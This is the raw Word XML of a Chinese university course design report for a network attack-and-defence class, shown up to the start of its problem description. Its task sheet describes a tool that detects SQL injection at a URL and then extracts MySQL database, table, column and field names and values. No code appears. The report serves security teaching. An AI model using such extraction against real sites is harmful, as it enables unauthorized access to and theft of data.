                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST </w:t>
            </w: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注入。语言不限，程序功能如下： </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="436022E8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⑴ 能够检测指定的 </w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">URL </w:t>
            </w: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站点是否存在 </w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL </w:t>
            </w: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注入。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2805D5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⑵ 爆破 </w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">MYSQL </w:t>
            </w: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数据库实例名。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C749744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⑶ 爆破 </w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">MYSQL </w:t>
            </w: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数据表。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FDBF235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⑷ 爆破 </w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">MYSQL </w:t>
            </w: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字段名 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E7A150" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/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⑸ 爆破 </w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">MYSQL </w:t>
            </w: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字段值 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005807BE" w14:paraId="1D496C10" w14:textId="77777777" w:rsidTr="004B482A">
        <w:trPr>
          <w:trHeight w:val="1778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4194" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>主要参考资料</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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CF8B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教材： </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="437DB5E0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王敏、甘刚、吴震、杜之波编著，网络攻击与防御，西安电子科技大学出版社，2017.1 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B73CEC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参考书： </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38A90ED0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[1] 陈波，于泠，软件安全技术，机械工业出版社，2018.8 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48AA1CAD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[2] 吴礼发、洪征，李华波，网络攻防原理与技术，机械工业出版社，2018.1 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="411AEDE4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[3] 肖遥，网站入侵与脚本攻防修炼，电子工业出版社，2008.3 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412523E3" w14:textId="77777777" w:rsidR="005807BE" w:rsidRPr="00671285" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr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 xml:space="preserve">[4] 黑客入侵网页攻防修炼，德瑞工作室，电子工业出版社，2008.6 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48DE900F" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00671285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[5] 陈波，于泠,计算机系统安全原理与技术，机械工业出版社，2017.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005807BE" w14:paraId="7CE3B18B" w14:textId="77777777" w:rsidTr="00A17B8C">
        <w:trPr>
          <w:trHeight w:val="1549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68C6" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>学生提交归档文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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27ED" w14:textId="77777777" w:rsidR="005807BE" w:rsidRPr="00671285" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:ind w:right="1"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>封面</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>—任务</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>书—目录—课程设计报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BFB22EA" w14:textId="4D3A2F5A" w:rsidR="009244CA" w:rsidRDefault="00A17B8C" w:rsidP="00A17B8C">
      <w:pPr>
        <w:ind w:left="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B76172" w14:textId="77777777" w:rsidR="00671285" w:rsidRPr="00671285" w:rsidRDefault="00671285" w:rsidP="00671285">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4082"/>
          <w:tab w:val="right" w:pos="9139"/>
        </w:tabs>
        <w:spacing w:after="3" w:line="256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724571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759D3" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
          <w:pPr>
            <w:pStyle w:val="TOC20"/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  <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="39BDE65E" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="832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4575" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af"/>
              </w:rPr>
              <w:t>课程设计小组报告</w:t>
            </w:r>
            <w:r w:rsidRPr="002D61F0">
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10497457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53B8196" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="00D76CD3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8326"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc104974576" w:history="1">
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>前言</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:instrText xml:space="preserve"> PAGEREF _Toc104974576 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16E71E61" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="00D76CD3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8326"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc104974577" w:history="1">
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">MYSQL </w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>注入检测的设计与实现</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:instrText xml:space="preserve"> PAGEREF _Toc104974577 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B851C45" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="00D76CD3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8326"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc104974578" w:history="1">
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>【问题描述】</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57" w:rsidRPr="0080374F">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:instrText xml:space="preserve"> PAGEREF _Toc104974578 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C9A6345" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="00D76CD3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8326"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc104974579" w:history="1">
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>【设计需求及分析】</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:instrText xml:space="preserve"> PAGEREF _Toc104974579 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49DF56F6" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="00D76CD3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8326"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc104974580" w:history="1">
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>【设计功能的实现】</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:instrText xml:space="preserve"> PAGEREF _Toc104974580 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1817EFD0" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="00D76CD3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8326"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc104974581" w:history="1">
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>【运行结果】</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:instrText xml:space="preserve"> PAGEREF _Toc104974581 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:t>37</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6957CD3C" w14:textId="03000D36" w:rsidR="009244CA" w:rsidRPr="007E3734" w:rsidRDefault="00D76CD3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8326"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc104974582" w:history="1">
            <w:r w:rsidR="003E1C57" w:rsidRPr="007E3734">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57" w:rsidRPr="007E3734">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>【心得体会】</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57" w:rsidRPr="007E3734">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003E1C57" w:rsidRPr="007E3734">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003E1C57" w:rsidRPr="007E3734">
              <w:instrText xml:space="preserve"> PAGEREF _Toc104974582 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003E1C57" w:rsidRPr="007E3734">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003E1C57" w:rsidRPr="007E3734">
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidR="003E1C57" w:rsidRPr="007E3734">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3407921B" w14:textId="72CA1F2C" w:rsidR="007E3734" w:rsidRPr="007E3734" w:rsidRDefault="00D76CD3" w:rsidP="007E3734">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8326"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc104974583" w:history="1">
            <w:r w:rsidR="007E3734">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>源代码</w:t>
            </w:r>
            <w:r w:rsidR="007E3734">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E3734">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E3734">
              <w:instrText xml:space="preserve"> PAGEREF _Toc104974583 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E3734">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E3734">
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="007E3734">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0017FF4E" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="33AA034B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1C4D1151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539E12F6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724A4C98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27694C45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0D9FC005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44964832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545C91D6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7E539941" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii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682B3CA2" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii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5DC213F4" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii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79845034" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii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040BDE06" w14:textId="77777777" w:rsidR="0008280E" w:rsidRDefault="0008280E">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193C73FB" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc104974576"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>前言</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3F3A3149" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA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1"/>
          <w:szCs w:val="31"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="368193D6" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"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《网络攻防课程设计》是信息安全工程专业的一门实践性课程。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24115C2D" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"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网络攻防课程设计是信息安全专业的重要实践性教学环节，其先修课程是计算机网络、网络攻击与防御、网络安全基础和 Web 程序设计。网络攻防课程设计旨在加深对学生网络攻防的基本原理的认识，熟悉黑客攻击网络的基本工具、步骤和方法，掌握 web 渗透测试的基本原理、过程和方法，掌握网络防御的基本原理和技能，使学生具备一定的信息安全系统评估能力，为从事信息安全行业的系统规划和防御打下坚实的基础。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4909DF3F" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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通过该课程设计的训练，学生应该具有如下基本技能：①培养学生查阅参考资料、手册的自学能力，通过独立思考深入钻研问题，学会自己分析、解决问题。②通过对所选题目方案分析比较，确立方案，编制程序与调试程序。③能熟练调试程序，在教师的指导下，完成课题任务。④根据个人的设计调试过程，按课程设计报告的要求撰写设计报告。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC656DF" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA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5FF5A77" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA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03E5C92" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="宋体" w:cs="黑体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">选用教材及主要参考书： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237248F9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 xml:space="preserve">教材： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72663CB7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王敏、甘刚、吴震、杜之波编著，网络攻击与防御，西安电子科技大学出版社，2017.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57342487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 xml:space="preserve">参考书： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066A2630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[1] 陈波，于泠，软件安全技术，机械工业出版社，2018.8 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3147BC6E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[2] 吴礼发、洪征，李华波，网络攻防原理与技术，机械工业出版社，2018.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28149C42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[3] 肖遥，网站入侵与脚本攻防修炼，电子工业出版社，2008.3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BB50B7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[4] 黑客入侵网页攻防修炼，德瑞工作室，电子工业出版社，2008.6 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621453EC" w14:textId="40B513B6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5] 陈波，于泠,计算机系统安全原理与技术，机械工业出版社，2017.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E45D99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13E7A0C2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380EF4B7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30CED9D6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0A87B9EB" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"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13F41150" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl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1548F299" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED99B80" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3A32DB" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc104974577"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">MYSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>注入检测的设计与实现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7FBDB08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B2A3B5B" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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专业：信息安全 班级:信安1901 姓名：蒋卓樾 秦赛灯 赵雪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唐思源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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33E5E8" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体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完成日期：2022年5月28日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807B292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5A5A7B35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5C3576F2" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc104974578"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>【问题描述】</w:t>
      </w:r>
